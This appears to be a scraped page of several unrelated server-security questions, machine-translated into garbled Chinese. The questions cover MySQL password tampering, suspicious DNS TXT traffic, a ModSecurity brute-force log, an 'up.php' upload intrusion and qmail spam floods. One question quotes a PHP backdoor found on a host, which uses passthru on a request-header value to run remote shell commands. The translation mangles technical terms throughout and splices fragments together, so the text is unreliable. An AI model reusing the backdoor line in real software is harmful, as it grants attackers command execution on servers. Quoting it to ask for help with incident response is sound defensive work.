我有一个公众可以访问的服务器,但我已经3次我是在别人的MySQL的根密码,谁知道密码,只有我。 我检查了服务器磁盘,我没有发现PHP注入等,我已经closures了functionexec在php中像passthru,exec,shell_exec等 在服务器上使用Ubuntu 10.04 Server和全新的安装操作系统,MySSQL版本14:14 Distrib 5.5.17,Nginx,php5-fpm。 我的问题是:是否有一个应用程序,可以通过在Ubuntu服务器的cron / job更改MySQL根密码? 谢谢。
最近我发现我的服务器产生了比平常多得多的stream量。 通常情况下,我每天大约有1-10 Mb,因为服务器只能作为电子邮件和静态网站的主机。 但是,在过去的三天里,它每天产生超过200 Mb的数据。 虽然我没有完全弄清楚这个问题,但对我来说,以下情况似乎非常可疑。 从控制台运行tshark时,我会得到像这样的连续请求: 19.825601 199.250.62.3 -> 78.46.177.18 DNS Standard query TXT txt3.fixlarge.com 19.831944 199.250.62.3 -> 78.46.177.18 DNS Standard query TXT txt3.fixlarge.com 19.842562 199.250.62.3 -> 78.46.177.18 DNS Standard query TXT txt409.tekjeton.com 19.844480 199.250.62.3 -> 78.46.177.18 DNS Standard query TXT txt3.fixlarge.com 19.846354 199.250.62.3 -> 78.46.177.18 DNS Standard query TXT txt9.triton1337.net 19.846561 199.250.62.3 -> […]
我是一个新的系统pipe理员,已经了解到我需要在单独的分区上有/ tmp和/ home目录,以防止基于硬链接攻击的特权升级的可能性。 不幸的是我的vps主机根本不允许分区! 这样,我剩下两个select… 1)要么放弃主机,2)请专家如果这是一个严重的问题,如果它,那么如果有任何其他方式,我们可以通过这种方式来防止基于硬链接的攻击! 在未来的vpspipe理过程中是否还有不能创build分区的缺点呢? 期待在这个问题上的指导。 谢谢你的帮助。
我运行一个简单的BlueHost网站,我需要使用自定义的Python脚本,所以我在我的网站的目录中创build了一个cgi-bin文件夹,并在那里添加了我的cgi python文件。 每次我试图使用AJAX请求来使用CGI脚本,但是,服务器不断返回500错误。 这是主要的错误日志显示: [Sun Nov 30 15:49:15 2014] [error] [client 91.121.209.34] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(Windows; U; Windows NT 5\\\\.1; ru; rv:1\\\\.9\\\\.0\\\\.2\\\\) Gecko\\\\/2008091620 Firefox\\\\/3\\\\.0\\\\.2" at REQUEST_HEADERS:User-Agent. [file "/etc/httpd/modsecurity.d/eig_rules.conf"] [line "58"] [id "900228"] [msg "Wordpress Brute Force :: Firefox 8"] [hostname "anewroundtable.com"] [uri "/wp-login.php/"] [unique_id "VHue6zJX@FcAADAOSWgAAACA"] [Sun Nov […]
我们已经看到在我们的办公室防火墙设备的事件日志中报告的正在进行的无线数据包泛滥(信标,探测请求和探测响应泛滥)。 这些正在被连续发送,并已经连续数周。 我们在一个多租户塔楼,所以我不知道它是源自我们的办公室还是来自我们附近的某个地方。 在这些数据包的源和/或目的地中使用的MAC地址是不断变化的(循环遍历它看起来像的范围),所以我认为这是工作之一,像空气裂缝,伪造数据包执行DoS。 这实际上并不是完全否认我们networking的使用,但它会不时导致缓慢的下降。 我知道你不能阻止这些数据包,因为它们没有明显的特征。 但是有什么办法来确定这些数据包从哪个物理区域发出? 我想知道可以根据数据包的时间对位置进行三angular测量的工具。
所以我只是被黑客攻击,通过在我的服务器上创build一个“up.php”文件,然后上传一个可以访问的x99.php来查找各种信息,如DB密码等。 我的主要问题是弄清楚用户如何设法上传“up.php”文件。 看着apache日志,用户发送了一个反馈脚本(处理表单提交),据我所知,脚本本身不容易被SQL注入,但是让我们假设它是。 用户使用黑客脚本发送反馈脚本(大概),然后在5分钟内什么也没做,此时他们只是请求服务器上的“up.php”脚本。 现在,他们到底是如何设法在服务器上获得up.php的呢? 我已经查询过mysql-binlog文件,看看在这个时候是否有奇怪的查询,但我可以看到垃圾邮件反馈查询。 SQL注入会出现在mysql-bin文件中吗? 即如果他们设法运行在服务器上创build一个文件的查询(“进入outfile”)等等,当然我会看到它在日志中? 我不知道他们是如何设法做到这一点,所以我希望对弱点有所build议。 检查'最后'没有login到服务器未知的IP 更多信息: CMS是自编码的,不能用于常见的wordpress / drupal /任何攻击 up.php上传/创build在一个全球图像目录,但据我所知,没有上传机制,通常会在这个目录下创build文件,因为它不是用于上传用户,只有全局文件(图像) 我的反馈脚本是在virtuals / atlas / feedback.php和全局图像目录是虚拟/ bilder – 所以不在同一个目录 feedback.php是100%自写的,并具有正常的SQL注入预防(它唯一的事情就是logging反馈),它不处理或保存任何文件。 但是,每个脚本都有一些支持文件可以加载,而其中一个可能存在问题的可能性很小。 从up.php创build时转储: 93.182.168.6 0,359 – [30/Jul/2017:11:26:32 +0200] "POST /atlas/feedback.php HTTP/1.1" 200 1817 "http://www.opennet.se/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" 93.182.168.6 – – [30/Jul/2017:11:26:32 +0200] "POST […]
我试图自动login到amazon web services与autoit在相当强化的Windows计算机上。 我可以运行脚本作为pipe理员在框中,它工作得很好,但是当我作为一个用户在“强化”的规则(通过安装Cyberark PSM软件硬化)进入。 我不得不修改组策略,只允许javascript不redirect到默认的AWS登陆页面。 我的自动脚本是把用户名和密码,但它没有成功地点击该用户下的login链接(尽pipe在自动脚本中调用点击的返回值表示它工作)。 这个自动脚本脚本在我的电脑上工作,如果我以pipe理员身份login,那么它就在那台服务器上工作,而不是locking用户。 $uname=$TargetUsername $pwd=$TargetPassword _IEFormElementSetValue ($oQuery1, $uname) _IEFormElementSetValue ($oQuery2, $pwd) _IEAction ($oButton, "click") _IELoadWait($oIE,0) 我已经尝试使用formSubmit,也有相同的结果。 我也试图直接调用oauth javascript方法,但我不确定那是什么,我用autoit尝试的东西没有工作。
在蜜jar之后,IBM的Billy Goat与恶意程序员密切合作。 那么,还有没有其他方法来检测和收集恶意人员的潜在攻击? 你的安全计划是什么? 为什么许多攻击者find解决方法来欺骗系统pipe理员? 请提供您的反馈。
我在主机上find了一个php后门程序。 <? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?> 我看到访问日志中的请求,该PHP文件是POST请求,但我不知道该variables的SETENV如何设置; 有人可以解释如何设置这样的variables,如果可能的话,我可以在服务器端限制/禁止设置这些variables。 谢谢 -H。
我的服务器上的qmail队列(在CentOS 5.2上运行Plesk)一夜之间在队列中放大了120,000多条消息。 队列中的消息显然是垃圾邮件。 我已经使用qmHandle在最后一天清除了它们,但我无法确定它们是如何被发送的。 他们发送的电子邮件地址甚至已经被添加到qmail badmailfrom文件中(我已经通过Telnettesting过它确实阻止了来自该地址的电子邮件),但是电子邮件继续泛滥。 我几乎肯定的说,这种攻击是利用服务器上托pipe的一个域的Web表单。 我相当有信心,如果能够确定哪一个,我可以find一种保证表格的方法。 问题是,如何确定电子邮件的来源?